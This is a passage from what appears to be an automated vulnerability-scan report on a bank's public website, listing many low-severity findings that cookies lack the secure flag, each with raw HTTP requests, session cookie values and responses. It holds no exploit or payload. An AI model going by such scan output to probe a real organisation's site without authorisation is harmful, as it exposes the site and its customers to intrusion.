Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 43
Content-Type: image/gif
Last-Modified: Thu, 02 Oct 2008 15:28:14 GMT
Accept-Ranges: bytes
ETag: "0fb457ca324c91:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:19 GMT

GIF89a.............!.......,...........D..;

10.100. https://www.regions.com/img/logoRegions_213x45.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/logoRegions_213x45.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/logoRegions_213x45.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 6788
Content-Type: image/gif
Last-Modified: Tue, 26 May 2009 17:12:46 GMT
Accept-Ranges: bytes
ETag: "03b2a3025dec91:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:19 GMT

GIF89a..-..........R.<w.g...............l.X...........u........=......z.i........=.......................m..B.....W..............................q.Y...........I.........g.Mc.K...U.B......S.<W.<.......
...[SNIP]...

10.101. https://www.regions.com/js/loadMedia.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/loadMedia.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loadMedia.js HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Type: application/x-javascript
Last-Modified: Thu, 18 Mar 2010 14:18:12 GMT
Accept-Ranges: bytes
ETag: "0aa72d7a5c6ca1:7c0f"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:15 GMT
Content-Length: 18069

...// (1) browser vendor:
// is_nav, is_firefox, is_ie, is_opera, is_hotjava, is_webtv, is_TVNavigator, is_AOLTV
// (2) browser version number:
// is_major (integer indicating major version
...[SNIP]...

10.102. https://www.regions.com/js/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/wtbase.js HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Type: application/x-javascript
Last-Modified: Thu, 06 Nov 2008 18:55:36 GMT
Accept-Ranges: bytes
ETag: "0c4bd404140c91:7c0f"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT
Content-Length: 13718

function DcsInit(){
   this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i";
   this.domain="statse.webtrendslive.com";
   this.enabled=true;
   this.exre=(function(){
       if (window.RegExp){
           return(new RegExp(
...[SNIP]...

10.103. https://www.regions.com/mortgage.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /mortgage.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23526


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.104. https://www.regions.com/personal_banking/alternative_education_loans.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/alternative_education_loans.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/alternative_education_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/alternative_education_loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/alternative_education_loans.rf">here</a>.</h2>
</body></html>

10.105. https://www.regions.com/personal_banking/auto_loans.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/auto_loans.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/auto_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/auto_loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/auto_loans.rf">here</a>.</h2>
</body></html>

10.106. https://www.regions.com/personal_banking/cds.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/cds.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/cds.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/cds.rf">here</a>.</h2>
</body></html>

10.107. https://www.regions.com/personal_banking/checking.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/checking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/checking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/checking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 168

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/checking.rf">here</a>.</h2>
</body></html>

10.108. https://www.regions.com/personal_banking/credit_cards.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/credit_cards.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/credit_cards.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/credit_cards.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/credit_cards.rf">here</a>.</h2>
</body></html>

10.109. https://www.regions.com/personal_banking/ehl.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/ehl.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/ehl.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/ehl.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/ehl.rf">here</a>.</h2>
</body></html>

10.110. https://www.regions.com/personal_banking/email_starting_net.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/email_starting_net.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/email_starting_net.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 178

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/email_starting_net.rf">here</a>.</h2>
</body></html>

10.111. https://www.regions.com/personal_banking/everyday_banking.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/everyday_banking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/everyday_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/everyday_banking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/everyday_banking.rf">here</a>.</h2>
</body></html>

10.112. https://www.regions.com/personal_banking/get_started_online_statements.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/get_started_online_statements.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_online_statements.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/get_started_online_statements.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 189

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/get_started_online_statements.rf">here</a>.</h2>
</body></html>

10.113. https://www.regions.com/personal_banking/home_equity_main.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/home_equity_main.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/home_equity_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/home_equity_main.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/home_equity_main.rf">here</a>.</h2>
</body></html>

10.114. https://www.regions.com/personal_banking/insurance.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/insurance.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/insurance.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/insurance.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 169

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/insurance.rf">here</a>.</h2>
</body></html>

10.115. https://www.regions.com/personal_banking/investing.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/investing.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/investing.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/investing.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 169

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/investing.rf">here</a>.</h2>
</body></html>

10.116. https://www.regions.com/personal_banking/loan_payment_hardship.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/loan_payment_hardship.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/loan_payment_hardship.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/loan_payment_hardship.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 181

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/loan_payment_hardship.rf">here</a>.</h2>
</body></html>

10.117. https://www.regions.com/personal_banking/loans_credit.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/loans_credit.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/loans_credit.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/loans_credit.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/loans_credit.rf">here</a>.</h2>
</body></html>

10.118. https://www.regions.com/personal_banking/mobile_banking.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/mobile_banking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/mobile_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/mobile_banking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 174

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/mobile_banking.rf">here</a>.</h2>
</body></html>

10.119. https://www.regions.com/personal_banking/money_market_main.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/money_market_main.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/money_market_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/money_market_main.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 177

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/money_market_main.rf">here</a>.</h2>
</body></html>

10.120. https://www.regions.com/personal_banking/morgan_keegan.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/morgan_keegan.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/morgan_keegan.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/morgan_keegan.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/morgan_keegan.rf">here</a>.</h2>
</body></html>

10.121. https://www.regions.com/personal_banking/open_account.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/open_account.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/open_account.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/open_account.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/open_account.rf">here</a>.</h2>
</body></html>

10.122. https://www.regions.com/personal_banking/platinum_visa_check.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/platinum_visa_check.rf

Issue detail

